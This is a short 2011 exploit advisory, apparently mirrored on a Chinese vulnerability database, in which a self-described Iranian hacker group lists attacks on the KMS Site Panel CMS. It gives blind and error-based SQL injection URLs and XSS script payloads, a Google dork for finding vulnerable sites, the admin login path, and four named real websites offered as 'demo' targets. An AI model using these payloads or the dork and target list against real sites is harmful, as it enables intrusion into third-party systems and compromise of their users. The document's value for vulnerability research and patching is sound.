KMS Site Panel multiple Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1048877 漏洞类型
发布时间 2011-08-12 更新时间 2011-08-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2011080083
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
"KMS Site Panel multiple Vulnerability"



Author: alieye

E-mail: cseye_ut@yahoo.com

Vendor : http://www.mediasoft.ir/

Version: All version

class : remote

Google dork (lang=Farsi) : "طراحي و اجراي سايت: شركت رایان رسانه كیش"



We Are: Alieye , Z0d14c , Bully13 , Alichi & All Iranian Hackers 

greetz: C.S.Eye Security Team members

Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com

----------------------------------------------------------------

Blind SQL Injection



1-/index.php?PageID=43-2+2*3-6

2-/index.php?ATPID=5&PSID=4-2+2*3-6

----------------------------------------------------------------

Cross Site Scripting



3-/index.php?ATPID=5&PSID=<ScRiPt >prompt(989309)</ScRiPt>&VID=5

4-input SearchText set to <ScRiPt >prompt(989309)</ScRiPt>

----------------------------------------------------------------

SQL injection



5-/index.php?ATPID=4'

6-/index.php?ATPID=4&PSID=2'

7-/index.php?PageID=45'

----------------------------------------------------------------

login page



http://site/CP/CP.php

----------------------------------------------------------------

demo website:

http://www.kish-hospital.com/

http://kishtourism.ir/

http://www.kishmalls.net/

http://www.shahrsazan.com/